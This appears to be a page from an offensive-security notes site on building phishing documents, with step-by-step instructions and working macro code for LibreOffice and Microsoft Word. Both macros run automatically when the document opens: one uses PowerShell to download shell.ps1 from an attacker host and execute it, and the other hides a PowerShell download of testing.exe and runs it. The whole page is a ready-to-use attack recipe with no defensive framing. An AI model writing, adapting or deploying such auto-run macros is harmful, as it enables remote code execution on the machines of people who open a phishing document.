Phishing Payload

Prepare for phishing payload

LibreOffice (Linux)

If your target have script to open the document, use LibreOffice is a simple way.

  1. Write Documents

  2. Create Macros

Tools > Macros > Organize Macro > Basic

[Basic Macros]

Untitled 1 > New > (give a name)

Macro payload:

Sub Main
    Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
    Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub

  1. Tools > Customize > Events [Open Document]

> Macro... > (choose last macro)

  1. Save Document.

Microsoft Word

make sure you save the document as doc or docm. just try that both for your payload.

  1. Write Documents

  2. Create Macros

make sure specify the Macros in to the current document.
View > Macros

[Basic Macros]

"MyMacro" > Create

Macro payload

check the encoded payload below:

Bypass All The Things

  1. Save Document.

Macro

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
    Dim exePath As String
    exePath = "C:\Windows\Tasks\" + "testing.exe"
    Shell str, vbHide
    Wait (3)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
PreviousPayloadNextBypass All The Things

Last updated